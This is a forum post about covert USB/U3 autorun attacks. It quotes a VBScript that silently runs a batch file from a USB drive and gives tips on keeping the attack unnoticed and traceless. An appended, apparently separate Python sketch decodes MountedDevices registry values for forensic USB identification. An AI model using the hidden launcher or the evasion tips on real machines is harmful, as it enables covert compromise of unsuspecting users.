Everything posted by hantakage

  1.     Set objFSO = CreateObject("Scripting.FileSystemObject")
         Set colDrives = objFSO.Drives
         For Each objDrive in colDrives
             If objFSO.FileExists(objDrive.DriveLetter & ":\wipcmd\go.cmd") Then
                 strPath = objDrive.DriveLetter & ":\wipcmd"
                 strcmd = """" & strPath & "\" & "go.cmd" & """"
                 CreateObject("Wscript.Shell").CurrentDirectory = strPath
                 CreateObject("Wscript.Shell").Run strcmd, 0, False
             End If
         Next

     Hi pseudobreed, I see one issue with your code. I've been working on various USB attacks over the past few months, originally being interested in hacking iPod firmware to get it to autorun, and had decided to try with U3 devices after I read up on them. The wonderful folks on this forum beat me to it by a couple of weeks though ;(

     Anyhow - your code will search through each drive on the system looking for the presence of the file "\wipcmd\go.cmd" in order to find the drive that the USB partition is on. This is what I had originally planned to do as well; unfortunately it is not as stealthy as I had hoped. If the user has a CD-ROM or floppy in the machine, your code will make a call to the disk to look for the presence of the file. In both these cases a user would realise something was going on, as the floppy will start making noise / the CD-ROM will start spinning.

     There are 2 ways I tried to get around this. Firstly you can check the values in the HKLM\System\MountedDevices key that are in the format "\DosDevices\[DRIVE LETTER]" and look for the value that corresponds to the USB drive. The other way (that I use) is a simple loop written in C++ that starts at D: and works through to Z: (then does A: - C:), calling GetVolumeInformation on each drive until you find the one whose serial number matches your disk. Or, easier again, rename your disk to something like " Local Disk" (note the space) and search the GetVolumeInformation for that. This is great as it does not actually query the disks themselves - just the registry.

     Then once you have your drive, just take the drive letter and ShellExecute your autorun file on the autorun partition. I'll post up my payload and stuff later on - it's similar to what people have already posted, with some small differences. The idea I wanted with my payload was that I wanted there to be no traces of the machine ever being touched - so there are no backdoors dropped, firewall settings changed etc.
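From the forensic side, the MountedDevices values mentioned in the post are also what an examiner reads to tell which drive letter a USB volume was given on a machine. The sketch below is an added example, not code from the post or the thread; it decodes the binary data of `\DosDevices\X:` values from an exported hive, and the sample values, vendor string and serial in it are constructed.

```python
import struct

def decode_mounted_device(data: bytes) -> dict:
    """Classify the data of one MountedDevices value."""
    if len(data) == 12:
        # MBR volume: 4-byte disk signature + 8-byte partition byte offset
        sig, offset = struct.unpack("<IQ", data)
        return {"kind": "mbr", "disk_signature": f"{sig:08X}",
                "partition_offset": offset}
    if len(data) == 24 and data.startswith(b"DMIO:ID:"):
        # GPT volume: marker followed by the 16-byte partition GUID
        return {"kind": "gpt", "partition_guid": data[8:].hex()}
    try:
        path = data.decode("utf-16-le")
    except UnicodeDecodeError:
        return {"kind": "unknown", "raw": data.hex()}
    if not path.startswith(("_??_", "\\??\\")):
        return {"kind": "unknown", "raw": data.hex()}
    # Device interface path: <prefix><enumerator>#<device>#<instance>#{class GUID}
    parts = path.split("#")
    upper = path.upper()
    # Some Windows versions record USB sticks as STORAGE#RemovableMedia
    is_usb = "USBSTOR" in upper or "REMOVABLEMEDIA" in upper
    return {"kind": "usb" if is_usb else "device", "device_path": path,
            "instance_id": parts[2] if len(parts) > 2 else None}

def usb_drive_letters(values: dict) -> dict:
    """Map drive letter -> device instance id for USB-backed volumes."""
    hits = {}
    for name, data in values.items():
        if not name.startswith("\\DosDevices\\"):
            continue  # skip the \??\Volume{...} entries
        rec = decode_mounted_device(data)
        if rec["kind"] == "usb":
            hits[name[-2:]] = rec["instance_id"]
    return hits

# Constructed sample: value name -> raw REG_BINARY data
USB_PATH = ("_??_USBSTOR#Disk&Ven_Example&Prod_Flash&Rev_1.00"
            "#0123456789AB&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}")
SAMPLE = {
    "\\DosDevices\\C:": struct.pack("<IQ", 0x1234ABCD, 1048576),
    "\\DosDevices\\E:": USB_PATH.encode("utf-16-le"),
    "\\??\\Volume{00000000-0000-0000-0000-000000000001}":
        USB_PATH.encode("utf-16-le"),
}

if __name__ == "__main__":
    for letter, instance in usb_drive_letters(SAMPLE).items():
        print(letter, instance)
```

The instance id recovered here can be matched against the USBSTOR device entries from the same system to tie a drive letter to a specific device.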